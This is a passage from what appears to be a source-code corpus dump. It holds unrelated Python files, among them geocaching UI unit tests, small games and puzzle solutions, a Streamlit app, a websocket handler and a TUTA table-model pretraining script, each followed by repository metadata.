expected = "Gib die Koordinaten ein "
expected += "(Format: X XX°XX.XXX, X XXX°XX.XXX oder URL (google maps oder geocaching.com/map))\n"
self.assertEqual(output, expected)
class TestAskForPath(unittest.TestCase):
def test_output(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.ask_for_path()
output = out.getvalue()
expected = "\nGib den Pfad zum GPS-Geraet ein (NICHT zum Unterordner 'GPX').\n"
expected += "Falls Standardpfad uebernommen werden soll: keine Eingabe\n"
self.assertEqual(output, expected)
def test_return(self):
with mock.patch('builtins.input', return_value="any_path"):
self.assertEqual(user_io.ask_for_path(), "any_path")
def test_default_return(self):
with mock.patch('builtins.input', return_value=""):
self.assertEqual(user_io.ask_for_path(), "default")
class TestAskForWaypoints(unittest.TestCase):
def test_yes(self):
with mock.patch('builtins.input', return_value="y"):
self.assertEqual(user_io.ask_for_waypoints(), True)
def test_no(self):
with mock.patch('builtins.input', return_value="n"):
self.assertEqual(user_io.ask_for_waypoints(), False)
def test_nonsense(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
self.assertEqual(user_io.ask_for_waypoints(), False)
class TestShowOnMapStart(unittest.TestCase):
def test_output_no_waypoints(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.show_on_map_start(False, False)
output = out.getvalue()
expected = "\nNach dem Klicken werden sich mehrere Fenster oeffnen. Eines davon ist der Editor, "
expected += "das andere die Seite mapcustomizer.com in deinem Browser.\n"
expected += "Um den Cache / die Caches auf der Karte anzuzeigen, " \
"kopiere den vollstaendigen Inhalt der Textdatei "
expected += "aus deinem Editor in das Feld 'Bulk Entry' im Browser.\n"
expected += "Die Caches werden in folgenden Farben angezeigt:\n"
expected += "Gruen: Traditional Cache\n"
expected += "Rot: Multi-cache\n"
expected += "Blau: Mystery Cache\n"
expected += "Braun: EarthCache\n"
expected += "Grau: Letterbox, Geocaching HQ\n"
expected += "Gelb: Event Cache, Wherigo Cache\n"
expected += "Pink: unbekannter Typ\n"
expected += "Gib nun den Pfad zu deinem Editor an: (bei Benutzung von Windows sollte das unnoetig sein)\n"
self.assertEqual(output, expected)
def test_output_all_waypoints(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.show_on_map_start(False, True)
output = out.getvalue()
expected = "\nNach dem Klicken werden sich mehrere Fenster oeffnen. Eines davon ist der Editor, "
expected += "das andere die Seite mapcustomizer.com in deinem Browser.\n"
expected += "Um den Cache / die Caches auf der Karte anzuzeigen, kopiere den vollstaendigen Inhalt "
expected += "der Textdatei aus deinem Editor in das Feld 'Bulk Entry' im Browser.\n"
expected += "Die Caches werden in folgenden Farben angezeigt:\n"
expected += "Gruen: Traditional Cache\n"
expected += "Rot: Multi-cache\n"
expected += "Blau: Mystery Cache\n"
expected += "Braun: EarthCache\n"
expected += "Grau: Letterbox, Geocaching HQ\n"
expected += "Gelb: Event Cache, Wherigo Cache, Wegpunkte\n"
expected += "Pink: unbekannter Typ\n"
expected += "Gib nun den Pfad zu deinem Editor an: (bei Benutzung von Windows sollte das unnoetig sein)\n"
self.assertEqual(output, expected)
def test_output_one_waypoints(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.show_on_map_start(True, True)
output = out.getvalue()
expected = "\nNach dem Klicken werden sich mehrere Fenster oeffnen. Eines davon ist der Editor, "
expected += "das andere die Seite mapcustomizer.com in deinem Browser.\n"
expected += "Um den Cache / die Caches auf der Karte anzuzeigen, kopiere den vollstaendigen Inhalt "
expected += "der Textdatei aus deinem Editor in das Feld 'Bulk Entry' im Browser.\n"
expected += "Gib nun den Pfad zu deinem Editor an: (bei Benutzung von Windows sollte das unnoetig sein)\n"
self.assertEqual(output, expected)
def test_output_one_no_waypoints(self): # makes no difference because it is nonsense
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.show_on_map_start(True, False)
output = out.getvalue()
expected = "\nNach dem Klicken werden sich mehrere Fenster oeffnen. Eines davon ist der Editor, "
expected += "das andere die Seite mapcustomizer.com in deinem Browser.\n"
expected += "Um den Cache / die Caches auf der Karte anzuzeigen, kopiere den vollstaendigen Inhalt "
expected += "der Textdatei aus deinem Editor in das Feld 'Bulk Entry' im Browser.\n"
expected += "Gib nun den Pfad zu deinem Editor an: (bei Benutzung von Windows sollte das unnoetig sein)\n"
self.assertEqual(output, expected)
def test_return(self):
with mock.patch('builtins.input', return_value="any_editor"):
self.assertEqual(user_io.show_on_map_start(False, True), "any_editor")
def test_default_return(self):
with mock.patch('builtins.input', return_value=""):
self.assertEqual(user_io.show_on_map_start(True, False), "notepad.exe")
class TestShowOnMapEnd(unittest.TestCase):
def test_output(self):
with mock.patch('builtins.input', return_value="any_nonsense"):
out = StringIO()
sys.stdout = out
user_io.show_on_map_end()
output = out.getvalue()
expected = "Schliesse den Editor und druecke Enter.\n"
self.assertEqual(output, expected)
def create_testsuite():
"""creates a testsuite with out of all tests in this file"""
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestGeneralOutput))
suite.addTest(unittest.makeSuite(TestGeneralInput))
suite.addTest(unittest.makeSuite(TestShowMainMenu))
suite.addTest(unittest.makeSuite(TestMainMenu))
suite.addTest(unittest.makeSuite(TestMapMenu))
suite.addTest(unittest.makeSuite(TestSortCaches))
suite.addTest(unittest.makeSuite(TestSearch))
suite.addTest(unittest.makeSuite(TestSearchType))
suite.addTest(unittest.makeSuite(TestSearchAttribute))
suite.addTest(unittest.makeSuite(TestActionsAfterSearch))
suite.addTest(unittest.makeSuite(TestActionsWithFounds))
suite.addTest(unittest.makeSuite(TestConfirmDeletion))
suite.addTest(unittest.makeSuite(TestWaypointMenu))
suite.addTest(unittest.makeSuite(TestChooseCache))
suite.addTest(unittest.makeSuite(TestShowOne))
suite.addTest(unittest.makeSuite(TestCoordinatesInput))
suite.addTest(unittest.makeSuite(TestAskForPath))
suite.addTest(unittest.makeSuite(TestAskForWaypoints))
suite.addTest(unittest.makeSuite(TestShowOnMapStart))
suite.addTest(unittest.makeSuite(TestShowOnMapEnd))
return suite
def main(v):
"""runs the testsuite"""
return test_frame.run(v, create_testsuite, "user_io.py")
if __name__ == '__main__':
if len(sys.argv) > 1: # if script is run with argument
verbosity = int(sys.argv[1])
else: # if no argument -> verbosity 1
verbosity = 1
main(verbosity)
| 44.936567 | 118 | 0.630096 |
bab3bada988756769c8b3327590eb6ad143eac63
| 35 |
py
|
Python
|
DjangoStarter/DjangoStarter/__init__.py
|
QuinntyneBrown/DjangoStarter
|
7c2f385546568604acbb4f18d8a473ecb3688202
|
[
"MIT"
] | null | null | null |
DjangoStarter/DjangoStarter/__init__.py
|
QuinntyneBrown/DjangoStarter
|
7c2f385546568604acbb4f18d8a473ecb3688202
|
[
"MIT"
] | null | null | null |
DjangoStarter/DjangoStarter/__init__.py
|
QuinntyneBrown/DjangoStarter
|
7c2f385546568604acbb4f18d8a473ecb3688202
|
[
"MIT"
] | null | null | null |
"""
Package for DjangoStarter.
"""
| 8.75 | 26 | 0.657143 |
240a7bd5f59637ee67ddbee7e1ddd123e959d491
| 391 |
py
|
Python
|
old/simple.py
|
friemoeh/stau
|
0a624759a9c65eda2be4cf62d0ece9a5ad7366bb
|
[
"Apache-2.0"
] | null | null | null |
old/simple.py
|
friemoeh/stau
|
0a624759a9c65eda2be4cf62d0ece9a5ad7366bb
|
[
"Apache-2.0"
] | null | null | null |
old/simple.py
|
friemoeh/stau
|
0a624759a9c65eda2be4cf62d0ece9a5ad7366bb
|
[
"Apache-2.0"
] | null | null | null |
from random import randrange
from Car import Car
car1 = Car("Porsche Cayman S",15, 250)
car1.drive(100)
for t in range(10):
print (t)
print(car1)
a=randrange(1,4)
if a == 1:
car1.brake(5)
print("breaking")
elif a == 2:
car1.acc(5)
print("acceleratione")
else:
car1.acc(0)
print("keep")
car1.goForward(t)
| 13.482759 | 38 | 0.544757 |
236804b13f6d0d6706e9d3a16451ccbf261c0e22
| 1,617 |
py
|
Python
|
comunication.py
|
Az107/Quark
|
10c0c953143fb9fc3351dbad9418880aeb5d5a56
|
[
"MIT"
] | 1 |
2020-11-22T22:22:59.000Z
|
2020-11-22T22:22:59.000Z
|
comunication.py
|
Az107/Quark
|
10c0c953143fb9fc3351dbad9418880aeb5d5a56
|
[
"MIT"
] | null | null | null |
comunication.py
|
Az107/Quark
|
10c0c953143fb9fc3351dbad9418880aeb5d5a56
|
[
"MIT"
] | 1 |
2020-11-22T22:24:19.000Z
|
2020-11-22T22:24:19.000Z
|
import asyncio
import websockets
import DisplayActions
import ctypes
import os
authenticated = True
dActions = DisplayActions.Actions()
reserved = ["load","fun"]
global websocket_pointer
async def commu(websocket, path):
async for message in websocket:
dActions.websocket_pointer = id(websocket)
try:
_class,_method = message.split(".")
if (_class == "change" and authenticated):
variable,value = _method.split(":",1)
item = getattr(dActions,variable)
setattr(item,"websocket_pointer",id(websocket))
item.value(value,False)
setattr(item,"name",variable)
setattr(dActions,variable,item)
elif (_class == "click" and _method not in reserved and authenticated):
method = None
method = getattr(dActions,_method)
method()
elif (_class == "load" and authenticated):
method = getattr(dActions,"load")
method()
elif (_class == "auth"):
if _method == str(os.getpid()): authenticated = True
except NameError as E:
print( message + " not exist")
except Exception as E:
print (message)
if (hasattr(E,"message")):
print("error" + E.mmessage)
else:
print(E)
def start():
port = int("8" + str(os.getpid())[1:])
ws = websockets.serve(commu, 'localhost', port)
loop = asyncio.get_event_loop()
loop.run_until_complete(ws)
loop.run_forever()
| 32.34 | 83 | 0.563389 |
23825cd9dfc310f9b5d988ee80f0a6b7747833c4
| 776 |
py
|
Python
|
ProjectEuler_plus/euler_025.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
ProjectEuler_plus/euler_025.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
ProjectEuler_plus/euler_025.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from math import ceil, log10
from itertools import count
def fib_number_of_digits(n):
'''
http://www.geeksforgeeks.org/finding-number-of-digits-in-nth-fibonacci-number/
'''
PHI = 1.6180339887498948
if n == 1:
return 1
d = (n * log10(PHI)) - (log10(5) / 2)
return ceil(d)
res = [0] * 5001
temp = 0
for i in range(5001):
for j in count(temp, 1):
if fib_number_of_digits(j) > i - 1:
res[i] = j
temp = j
break
for _ in range(int(input().strip())):
N = int(input().strip())
print(res[N])
#
#
#for _ in range(int(input().strip())):
# N = int(input().strip())
# for i in count(1):
# if fib_number_of_digits(i) > N - 1:
# break
# print(i)
#
| 21.555556 | 82 | 0.550258 |
cc76ab83ee81f7e53e657e377715df89a15908d9
| 1,101 |
py
|
Python
|
app/appdev.py
|
student1304/co2
|
dc83bb19d1f75ac7b04273e8d9c3f14a3a44153c
|
[
"Apache-2.0"
] | null | null | null |
app/appdev.py
|
student1304/co2
|
dc83bb19d1f75ac7b04273e8d9c3f14a3a44153c
|
[
"Apache-2.0"
] | null | null | null |
app/appdev.py
|
student1304/co2
|
dc83bb19d1f75ac7b04273e8d9c3f14a3a44153c
|
[
"Apache-2.0"
] | null | null | null |
import streamlit as st
import pandas as pd
#import numpy as np
#import time
from api_tools import get_product_info
# load md text from file and display on page
path_to_md = "./intro.md"
with open(path_to_md, "r") as f:
md_text = f.read()
st.markdown(md_text)
# load and display cart
cart_csv = st.file_uploader('Drag&Drop CSV oder Upload hier', type="csv")
if cart_csv is not None:
data = pd.read_csv(cart_csv, sep=',', decimal='.')
st.write(data)
st.balloons()
#loop through cart and show categories
for gtin in data.GTIN:
#st.write(gtin)
info = get_product_info(gtin)
st.info('getting info for... '+str(gtin))
if info['status'] != 1:
st.markdown(' - **no info** available in openfoodfacts.org')
else:
image_url = info['product']['selected_images']['front']['thumb']['de']
st.markdown('' %image_url)
st.write(
info['product']['packaging_tags'],
info['product']['categories_hierarchy']
)
st.success('it worked!')
| 29.756757 | 82 | 0.603996 |
cc87991e668d4c05c3bd94d6016210d3ddbd3ed6
| 1,139 |
py
|
Python
|
0021merge-two-sorted-lists.py
|
meat00/my-leetcode-python
|
8312de396b29e1d6dd54a65f87fa0511eb400faa
|
[
"MIT"
] | null | null | null |
0021merge-two-sorted-lists.py
|
meat00/my-leetcode-python
|
8312de396b29e1d6dd54a65f87fa0511eb400faa
|
[
"MIT"
] | null | null | null |
0021merge-two-sorted-lists.py
|
meat00/my-leetcode-python
|
8312de396b29e1d6dd54a65f87fa0511eb400faa
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
def __str__(self):
text = str()
node = self
while node != None:
text += "%d->" %node.val
node = node.next
text += "None"
return text
class Solution:
def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:
head = ListNode(0)
l3 = head
while l1 and l2:
if l1.val < l2.val:
l3.next = l1
l1 = l1.next
else:
l3.next = l2
l2 = l2.next
l3 = l3.next
if l1:
l3.next = l1
if l2:
l3.next = l2
return head.next
if __name__ == "__main__":
s = Solution()
a1 = ListNode(1)
a2 = ListNode(2)
a4 = ListNode(4)
b1 = ListNode(1)
b3 = ListNode(3)
b4 = ListNode(4)
a1.next = a2
a2.next = a4
b1.next = b3
b3.next = b4
print(a1)
print(b1)
ret = s.mergeTwoLists(a1, b1)
print('merge:', end='')
print(ret)
| 20.709091 | 68 | 0.461809 |
cc8c3bb1597e5b3ca5cdf3e9d3c20f30873bf602
| 3,638 |
py
|
Python
|
skimind/kernel/useCases/buildTicket/dataFilter.py
|
NathBangwa/SkimindFoot
|
8ae3a00074c56dd981fbfdab30e29898ddcaf6be
|
[
"MIT"
] | 1 |
2020-11-13T18:30:47.000Z
|
2020-11-13T18:30:47.000Z
|
skimind/kernel/useCases/buildTicket/dataFilter.py
|
nathanbangwa243/SkimindFoot
|
8ae3a00074c56dd981fbfdab30e29898ddcaf6be
|
[
"MIT"
] | 5 |
2020-11-13T18:16:48.000Z
|
2021-09-08T01:04:59.000Z
|
skimind/kernel/useCases/buildTicket/dataFilter.py
|
nathanbangwa243/SkimindFoot
|
8ae3a00074c56dd981fbfdab30e29898ddcaf6be
|
[
"MIT"
] | null | null | null |
#-*-coding: utf-8 -*-
# interfacedb
from . import interfacedb
# gFunctions
from . import gFunctions
# tools
import pandas as pd
import numpy as np
# config
from . import config
def get_ticket_columns():
columns = [
*interfacedb.modelTables.matchs.get_primary_key(),
interfacedb.modelTables.matchs.time,
interfacedb.modelTables.matchs.home,
interfacedb.modelTables.matchs.visitor,
]
return columns
def get_datas(task_list:list, margin_time:int):
"""
"""
datas_df = interfacedb.modelRequest.get_prediction_datas()
# colonnes predictions des taches selectionnnées
predictions_columns = map(interfacedb.modelTables.prediction.get_predict_task_col, task_list)
predictions_columns = list(predictions_columns)
def transforme_class_to_betid():
"""
transforme les classe en bet_id
"""
nonlocal datas_df
nonlocal predictions_columns
for index_task, pred_cols in enumerate(predictions_columns):
# task name
task_name = task_list[index_task]
datas_df[pred_cols] = [interfacedb.modelTables.matchs.get_betid_from(task_name, class_id)
for class_id in datas_df[pred_cols]]
def filter_best_prediction():
"""
"""
nonlocal datas_df
nonlocal predictions_columns
def get_probabilities_cols():
columns = []
for task_name in task_list:
columns += interfacedb.modelTables.prediction.get_task_probabilities_cols(task_name)
return columns
probabilities_columns = get_probabilities_cols()
target_datas = {
config.COTE_COL: [],
config.PROBABILITY_COL: [],
config.PREDICTION_COL: []
}
for index in datas_df.index:
# les probabilities
probabilities = datas_df.loc[index, probabilities_columns]
probabilities = list(probabilities.values)
# meilleur probability
best_probability = max(probabilities)
# task probabilities column
index_prob = probabilities.index(best_probability)
task_prob_name = probabilities_columns[index_prob]
# task name
task_names = filter(lambda task: task.lower() in task_prob_name, task_list)
task_names = list(task_names)
best_task_name = task_names[0]
# best prediction
best_pred_cols = interfacedb.modelTables.prediction.get_predict_task_col(best_task_name)
best_prediction = datas_df.loc[index, best_pred_cols]
# best cote
cote_cols = interfacedb.modelTables.matchs.format_cote(best_prediction)
best_cote = datas_df.loc[index, cote_cols]
# add datas
target_datas[config.COTE_COL].append(best_cote)
target_datas[config.PROBABILITY_COL].append(best_probability)
target_datas[config.PREDICTION_COL].append(best_prediction)
# ticket columns
ticket_columns = get_ticket_columns()
# donnees importantes
datas_df = datas_df[ticket_columns]
# add cote prediction probability columns
datas_df[config.COTE_COL] = target_datas[config.COTE_COL]
datas_df[config.PREDICTION_COL] = target_datas[config.PREDICTION_COL]
datas_df[config.PROBABILITY_COL] = target_datas[config.PROBABILITY_COL]
transforme_class_to_betid()
filter_best_prediction()
return datas_df
| 28.645669 | 102 | 0.64541 |
4e07aae04b48816df9b9ec4ed208675854d38c5b
| 528 |
py
|
Python
|
PMIa/2015/KOLOV_A_A/task_6_14.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PMIa/2015/KOLOV_A_A/task_6_14.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PMIa/2015/KOLOV_A_A/task_6_14.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Задача 6. Вариант 14.
# оздайте игру, в которой компьютер загадывает имя одного из трех официальных талисманов зимних Олимпийских игр 2014 года в Сочи, а игрок должен его угадать.
# Kolov A.A
# 25.05.2016
import random
mascots = ['Леопард','Белый Мишка','Зайка']
progSel = mascots[random.randint(0,2)]
userSel = input("Компьютер загадал одного из талисманов Олимпиады в Сочи. Сможете ли вы его удадать? ")
if userSel==progSel:
print("Верно! Это действительно " + userSel)
else:
print("Неверно! Это не " + userSel)
input()
| 35.2 | 157 | 0.744318 |
4e3e8457ecaa37412f76888b6250fd5d05ed950d
| 475 |
py
|
Python
|
559-maximum-depth-of-n-ary-tree/559-maximum-depth-of-n-ary-tree.py
|
hyeseonko/LeetCode
|
48dfc93f1638e13041d8ce1420517a886abbdc77
|
[
"MIT"
] | 2 |
2021-12-05T14:29:06.000Z
|
2022-01-01T05:46:13.000Z
|
559-maximum-depth-of-n-ary-tree/559-maximum-depth-of-n-ary-tree.py
|
hyeseonko/LeetCode
|
48dfc93f1638e13041d8ce1420517a886abbdc77
|
[
"MIT"
] | null | null | null |
559-maximum-depth-of-n-ary-tree/559-maximum-depth-of-n-ary-tree.py
|
hyeseonko/LeetCode
|
48dfc93f1638e13041d8ce1420517a886abbdc77
|
[
"MIT"
] | null | null | null |
"""
# Definition for a Node.
class Node:
def __init__(self, val=None, children=None):
self.val = val
self.children = children
"""
class Solution:
def maxDepth(self, root: 'Node') -> int:
if not root:
return 0
stack=[(root, 1)]
while(stack):
cur, level = stack.pop(0)
if cur.children:
for c in cur.children:
stack.append((c, level+1))
return level
| 25 | 48 | 0.509474 |
9d8e4cc86959dac85085503a187249ee7cb7a265
| 1,467 |
py
|
Python
|
INBa/2015/Mitin_D_S/task_9_15.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
INBa/2015/Mitin_D_S/task_9_15.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
INBa/2015/Mitin_D_S/task_9_15.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
#Создайте игру, в которой компьютер выбирает какое-либо слово, а игрок должен его отгадать.
#Компьютер сообщает игроку, сколько букв в слове, и дает пять попыток узнать,
#есть ли какая-либо буква в слове, причем программа может отвечать только "Да" и "Нет".
#Вслед за тем игрок должен попробовать отгадать слово.
# Mitin D.S.
# 10.05.2016, 22:18
import random
slova=("здоровье","май","программирование","питон","лето","сессия","пять")
zagadka=random.choice(slova)
proverka=zagadka
chislo=len(zagadka)
bykva = random.randrange(chislo)
i=4
k=0
print("Здравствуй, студент! Ты должен спасти мир, отгадав загаданное словов!")
print("Ты называешь буквы, а я говорю тебе, есть ли она в слове, или нет! И у тебя есть только пять попыток! ПЯТЬ!")
dymai=input("Ты готов сыграть в игру? ")
if dymai == "Нет" or dymai == "нет":
exit(0)
else: print ("Тогда поехали!")
print("Я загадал слово и в нем",chislo,"букв!")
poisk=input("Вводи букву: ")
while i>0:
if poisk in proverka:
print("Есть такая буква!")
else: print("Нет такой буквы")
i-=1
poisk=input("Вводи еще одну букву: ")
print("Все! У тебя кончились попытки! Теперь отгадай слово! Давай я тебе помогу! В нем всего лишь",chislo,'букв!')
while poisk != zagadka:
poisk=input("Итак, по-твоему, это слово: ")
if poisk !=zagadka: print("Не угадал! Давай еще попробуй! ну а вдруг угадаешь :)")
print("Да! ДА! ТЫ УГАДАЛ! Это",zagadka,"!!! Теперь я могу тебя выпустить!")
input("Нажми ENTER, чтобы я тебя освободил!")
| 40.75 | 116 | 0.722563 |
9dde70e629b8e7cb82755d4576cc05f224e55128
| 11,275 |
py
|
Python
|
tuta/train.py
|
PseudoLabs-Demo/TUTA_table_understanding
|
d0f3fe2f15c56a5ea9f593b210296f170fc74558
|
[
"MIT"
] | 36 |
2021-06-15T01:04:27.000Z
|
2022-03-19T16:36:54.000Z
|
tuta/train.py
|
PseudoLabs-Demo/TUTA_table_understanding
|
d0f3fe2f15c56a5ea9f593b210296f170fc74558
|
[
"MIT"
] | 6 |
2021-09-03T11:29:36.000Z
|
2021-12-15T11:33:57.000Z
|
tuta/train.py
|
PseudoLabs-Demo/TUTA_table_understanding
|
d0f3fe2f15c56a5ea9f593b210296f170fc74558
|
[
"MIT"
] | 8 |
2021-11-03T04:32:36.000Z
|
2022-02-02T13:43:47.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Do Pre-Training of TUTA Model (variants)
"""
import torch
import argparse
import torch.distributed as dist
import torch.multiprocessing as mp
import tokenizer as tknr
import model.pretrains as ptm
import trainers as tnr
import dynamic_data as dymdata
from utils import init_tuta_loose, init_with_bert_weight
from optimizer import AdamW, WarmupLinearSchedule
from torch.nn.parallel import DistributedDataParallel
def worker(proc_id, gpu_ranks, args, model):
if args.dist_train: # multiple GPU mode
rank = gpu_ranks[proc_id] % args.world_size
gpu_id = gpu_ranks[proc_id] % args.device_count
elif args.single_gpu: # single GPU mode
rank = None
gpu_id = proc_id
else: # CPU mode
rank = None
gpu_id = None
if args.dist_train:
train_loader = dymdata.DataLoaders[args.target](args, rank, args.world_size, True)
else:
train_loader = dymdata.DataLoaders[args.target](args, 0, 1, True)
if gpu_id is not None:
torch.cuda.set_device(gpu_id)
model.cuda(gpu_id)
# build optimizer
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'gamma', 'beta']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if (not any(nd in n for nd in no_decay)) ], 'weight_decay_rate': 0.01},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay) ], 'weight_decay_rate': 0.0}
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, correct_bias=False)
scheduler = WarmupLinearSchedule(optimizer, warmup_steps=args.total_steps*args.warmup, t_total=args.total_steps)
if args.dist_train:
# initialize multiprocessing distributed training environment
dist.init_process_group(
backend=args.backend,
init_method=args.master_ip,
world_size=args.world_size,
rank=rank
)
model = DistributedDataParallel(model, device_ids=[gpu_id], find_unused_parameters=True) # find_unused_parameters=True
print("Worker {} is training ... ".format(rank))
else:
print("Worker is training ...")
tnr.TRAINERS[args.target](args, gpu_id, rank, train_loader, model, optimizer, scheduler)
def train_and_validate(args):
args.tokenizer = tknr.TutaTokenizer(args)
args.vocab_size = len(args.tokenizer.vocab)
model = ptm.MODELS[args.target](args)
if args.load_type == "bert":
model = init_with_bert_weight(args, model)
elif args.load_type == "tuta":
init_tuta_loose(model=model, tuta_path=args.pretrained_model_path)
else:
init_tuta_loose(model=model, tuta_path=None)
if args.dist_train: # multiple GPU mode
mp.spawn(worker, nprocs=args.ranks_num, args=(args.gpu_ranks, args, model), daemon=False)
elif args.single_gpu: # single GPU mode
worker(args.gpu_id, None, args, model)
else: # CPU mode
worker(None, None, args, model)
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# vocabulary options
parser.add_argument("--vocab_path", type=str, default="./vocab/bert_vocab.txt", help="Path of the vocabulary file.")
parser.add_argument("--context_repo_path", type=str, default="./vocab/context_repo_init.txt", help="TXT of pre-collected context pieces.")
parser.add_argument("--cellstr_repo_path", type=str, default="./vocab/cellstr_repo_init.txt", help="TXT of pre-collected context pieces.")
# model configuration options
parser.add_argument("--hidden_size", type=int, default=768, help="Size of the hidden states.")
parser.add_argument("--intermediate_size", type=int, default=3072, help="Size of the intermediate layer.")
parser.add_argument("--magnitude_size", type=int, default=10, help="Max magnitude of numeric values.")
parser.add_argument("--precision_size", type=int, default=10, help="Max precision of numeric values.")
parser.add_argument("--top_digit_size", type=int, default=10, help="Most significant digit from '0' to '9'.")
parser.add_argument("--low_digit_size", type=int, default=10, help="Least significant digit from '0' to '9'.")
parser.add_argument("--row_size", type=int, default=256, help="Max number of rows in table.")
parser.add_argument("--column_size", type=int, default=256, help="Max number of columns in table.")
parser.add_argument("--tree_depth", type=int, default=4, help="Maximum depth of top & left header tree.")
parser.add_argument("--node_degree", type=str, default="32,32,64,256", help="Maximum number of children of each tree node.")
parser.add_argument("--num_format_feature", type=int, default=11, help="Number of features of the format vector.")
parser.add_argument("--attention_distance", type=int, default=8, help="Maximum distance for attention visibility.")
parser.add_argument("--attention_step", type=int, default=0, help="Step size of attention distance to add for each layer.")
parser.add_argument("--num_attention_heads", type=int, default=12, help="Number of the attention heads.")
parser.add_argument("--num_encoder_layers", type=int, default=12, help="Number of the encoding layers.")
parser.add_argument("--num_tcr_type", type=int, default=2, help="Number of table-context classes.")
parser.add_argument("--hidden_dropout_prob", type=int, default=0.1, help="Dropout probability for hidden layers.")
parser.add_argument("--attention_dropout_prob", type=int, default=0.1, help="Dropout probability for attention.")
parser.add_argument("--layer_norm_eps", type=float, default=1e-6)
parser.add_argument("--hidden_act", type=str, default="gelu", help="Activation function for hidden layers.")
# verion options
parser.add_argument("--target", type=str, default="tuta", choices=["tuta", "tuta_explicit", "base"], help="Model variants.")
parser.add_argument("--attn_method", type=str, default="add", choices=["max", "add"])
# data size/processing options
parser.add_argument("--max_seq_len", type=int, default=256, help="Maximum length of the table sequence.")
parser.add_argument("--max_cell_num", type=int, default=256, help="Maximum cell number used in data loaders.")
parser.add_argument("--max_cell_length", type=int, default=64, help="Maximum number of tokens in one cell string.")
parser.add_argument("--max_disturb_num", type=int, default=20, help="Maximum number of cells to be disturbed per table.")
parser.add_argument("--disturb_prob", type=float, default=0.15, help="Probability to be disturbed per cell.")
parser.add_argument("--add_separate", type=bool, default=True, help="Whether to add [SEP] as aggregate cell representation.")
parser.add_argument("--text_threshold", type=float, default=0.5, help="Probability threshold to sample text in data region.")
parser.add_argument("--value_threshold", type=float, default=0.1, help="Prob to sample value in data region.")
parser.add_argument("--clc_rate", type=float, default=0.3)
parser.add_argument("--hier_or_flat", type=str, default="both", choices=["hier", "flat", "both"])
parser.add_argument("--wcm_rate", type=float, default=0.3, help="Proportion of masked cells doing whole-cell-masking.")
parser.add_argument("--clc_weight", type=float, default=1.0, help="Weight assigned to clc loss.")
# training options
parser.add_argument("--batch_size", type=int, default=12, help="Size of the input batch.")
parser.add_argument("--total_steps", type=int, default=1000000, help="Total training steps.")
parser.add_argument("--report_steps", type=int, default=100, help="Specific steps to print prompt.")
parser.add_argument("--save_checkpoint_steps", type=int, default=100000, help="Specific steps to save model checkpoint.")
parser.add_argument("--buffer_size", type=int, default=500000, help="The buffer size of instances in memory.")
parser.add_argument("--chunk_size", type=int, default=50000, help="Mininum chunk size from a random data set.")
# io options
parser.add_argument("--dataset_paths", type=str, default='../dataset.pt', help="Paths of the preprocessed dataset.")
parser.add_argument("--pretrained_model_path", type=str, default=None, help="Path of the pretrained bert/ts model.")
parser.add_argument("--load_type", type=str, default="tuta", choices=["tuta", "bert", None])
parser.add_argument("--output_model_path", type=str, default="tuta.bin", help="Path of the output model.")
# optimizer options
parser.add_argument("--warmup", type=float, default=0.1, help="Warm up value.")
parser.add_argument("--learning_rate", type=float, default=2e-5, help="Initial learning rate.")
# gpu options
parser.add_argument("--world_size", type=int, default=1, help="Total number of processes (GPUs) for training.")
parser.add_argument("--gpu_ranks", default=[], nargs='+', type=int, help="List of ranks of each process."
" Each process has a unique integer rank whose value in the interval [0, world_size], and runs in a single GPU.")
parser.add_argument("--master_ip", default="tcp://localhost:12345", type=str, help="IP-Port of master for training.")
parser.add_argument("--backend", choices=["nccl", "gloo"], default="nccl", type=str, help="Distributed backend.")
args = parser.parse_args()
args.node_degree = [int(degree) for degree in args.node_degree.split(',')]
if args.target == "tuta_explicit":
args.node_degree = [32, 32, 64, 160]
print("node degree: ", args.node_degree)
# convert '+'-connected dataset_paths into list of strings
args.dataset_paths = args.dataset_paths.split('+')
ranks_num = len(args.gpu_ranks)
if args.world_size > 1:
assert torch.cuda.is_available(), "No available GPUs."
assert ranks_num <= args.world_size, "Started processes exceed `world_size` upper limit."
assert ranks_num <= torch.cuda.device_count(), "Started processes exceeds the available GPUs."
# multiple GPU mode
args.dist_train = True
args.ranks_num = ranks_num
